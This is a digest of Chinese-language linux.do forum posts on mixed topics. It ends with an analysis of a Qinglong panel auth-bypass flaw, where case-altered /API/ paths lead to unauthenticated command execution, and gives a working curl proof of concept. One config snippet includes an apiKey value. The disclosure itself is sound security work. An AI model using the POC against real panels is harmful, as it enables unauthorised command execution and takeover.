标题: 电车语音关闭行车大灯事故后，多家新能源厂商已经更新推送新的使用逻辑，务必更新
作者: #雪梨纽西兰希思露甘奶迪
板块: #搞七捻三
编号: 1664983
帖子: https://linux.do/t/topic/1664983
时间: 2026-02-27 12:45:26
摘要:

finance.sina.com.cn – 27 Feb 26
  

  
    

男子高速上语音呼叫“关闭阅读灯”，智能助手误将大灯熄灭，致车辆撞上护栏

  男子高速上语音呼叫“关闭阅读灯”，智能助手误将大灯熄灭，致车辆撞上护栏

标题: 4k显示器是不是必须看4k视频才有效果？
作者: #coolbao
板块: #搞七捻三
编号: 1664984
帖子: https://linux.do/t/topic/1664984
时间: 2026-02-27 12:45:54
摘要:

比如有一个4k显示器，看普通的网页，看网盘下载的普通的1080视频教程和影视剧，是不是还不如1080的显示器看的舒服？毕竟4k资源的视频教程很少

标题: opencode怎么支持中转站的gpt-5.3-codex
作者: #zjh
板块: #搞七捻三
编号: 1664985
帖子: https://linux.do/t/topic/1664985
时间: 2026-02-27 12:46:46
摘要:

{
“$schema”: “https://opencode.ai/config.json”,
“disabled_providers”: ,
“provider”: {
“axonhub-codex”: {
“npm”: “@ai-sdk/openai”,
“name”: “AxonHub Codex聚合”,
“options”: {
“apiKey”: “sk-c79af602”,
“baseURL”: “https://v1”,
“setCacheKey”: true
},
“models”: {
“gpt-5.3-codex”: {
“name”: “gpt-5.3-codex”,
“limit”: {
“context”: 400000,
“output”: 128000
},
“modalities”: {
“input”: [
“text”,
“image”,
“pdf”
],
“output”: [
“text”
]
},
“variants”: {
“low”: {
“reasoningEffort”: “low”,
“reasoningSummary”: “auto”,
“textVerbosity”: “medium”
},
“medium”: {
“reasoningEffort”: “medium”,
“reasoningSummary”: “auto”,
“textVerbosity”: “medium”
},
“high”: {
“reasoningEffort”: “high”,
“reasoningSummary”: “auto”,
“textVerbosity”: “medium”
},
“xhigh”: {
“reasoningEffort”: “xhigh”,
“reasoningSummary”: “auto”,
“textVerbosity”: “medium”
}
}
}
}
}
}
}

标题: 喜大普奔-codex 桌面版终于支持正文了
作者: #桃花
板块: #搞七捻三
编号: 1664986
帖子: https://linux.do/t/topic/1664986
时间: 2026-02-27 12:46:53
摘要:

标题: 想玩玩sora 发现无法生成
作者: #溪羡楼
板块: #搞七捻三
编号: 1664989
帖子: https://linux.do/t/topic/1664989
时间: 2026-02-27 12:47:38
摘要:

如图所示 有佬友知道怎么回事吗

标题: 大家都说说自己是如何使用AI开发项目
作者: #jackmaly
板块: #开发调优
编号: 1664995
帖子: https://linux.do/t/topic/1664995
时间: 2026-02-27 12:51:18
摘要:

我先说下我自己是如何使用。
我一般是会为每个模块建立一些文档，包括设计文档，使用文档，API文档以及任务清单。并创建一个全局ai_schema文档，上列出每个模块的功能摘要以及文档路径。然后AI规则文档关联ai_schema文档，并建立文档的自动更新维护规则.这样可以通过ai_schema文档快速检索现有模块的能力，尽量减少重复造轮子以及减轻上下文的压力。

标题: Win视频文件夹下面有几个文件夹找不到路径，但能打开它，怎么回事？
作者: #liuweiqing
板块: #开发调优
编号: 1664997
帖子: https://linux.do/t/topic/1664997
时间: 2026-02-27 12:54:07
摘要:

标题: 求助求助，老妹买皮肤没在平台交易疑似被骗怎么办
作者: #sd9ard3n
板块: #搞七捻三
编号: 1664999
帖子: https://linux.do/t/topic/1664999
时间: 2026-02-27 12:54:46
摘要:

佬友们，老妹在抖音评论区看到卖皮肤的，好奇和她交流了一翻，然后加微信在微信交易后，卖家说出意外了被卖家家里小妹给皮肤领走了，然后钱一直拖着不给也不删好友，有时候迟迟不回信息怎么办，三百多块钱

标题: 有哪些地方可以白嫖(几十元)年付水管机？就是那种几兆带宽的
作者: #chinese learn
板块: #搞七捻三
编号: 1665004
帖子: https://linux.do/t/topic/1665004
时间: 2026-02-27 12:55:57
摘要:

服务器过期了，想买几个年付的小机子

标题: 0day 青龙面板 最新版本 鉴权绕过导致 RCE 分析
作者: #棉花糖
板块: #前沿快讯
编号: 1665010
帖子: https://linux.do/t/topic/1665010
时间: 2026-02-27 12:58:47
摘要:

1. 漏洞摘要
青龙面板最新版存在一处鉴权绕过漏洞，未认证请求可访问高权限接口，并最终触发命令执行。
攻击者可通过大小写变形路径（如 /API/...）绕过鉴权并命中 /api/... 实际路由。
由于 /api/system/command-run 可执行系统命令，最终形成未授权远程命令执行（RCE）。
2026年2月24日在github已有用户被植入挖矿，26日绿联从应用商店下架青龙面板。
目前社区反馈项目官方后暂无回应，建议关闭青龙面板的公网访问。
2. 漏洞分析
back/loaders/express.ts
path: [...config.apiWhiteList, /^\/(?!api\/).*/]

这里的正则匹配写的有问题，严格匹配了纯小写的api，只要不是 /api/ 开头，就会绕过 JWT 校验，自定义鉴权中间件使用的是req.path.startsWith判断，它也是严格判断纯小写，并直接放行：
if (!['/open/', '/api/'].some((x) => req.path.startsWith(x))) {
  return next();
}

所以/API/这类路径会跳过令牌校验，同时又因为Express 默认大小写不敏感，/API/... 还能匹配到 /api/... 这个路由。
app.use(config.api.prefix, routes());

最终绕过了全部鉴权，随意调用后端api，青龙面板的api中有超多可利用的点，随便找一个命令执行的接口就可以利用。
3.POC：
curl -X PUT "http://localhost:5700/aPi/system/command-run" \     
-H "Content-Type: application/json" \
-d '{"command": "id"}'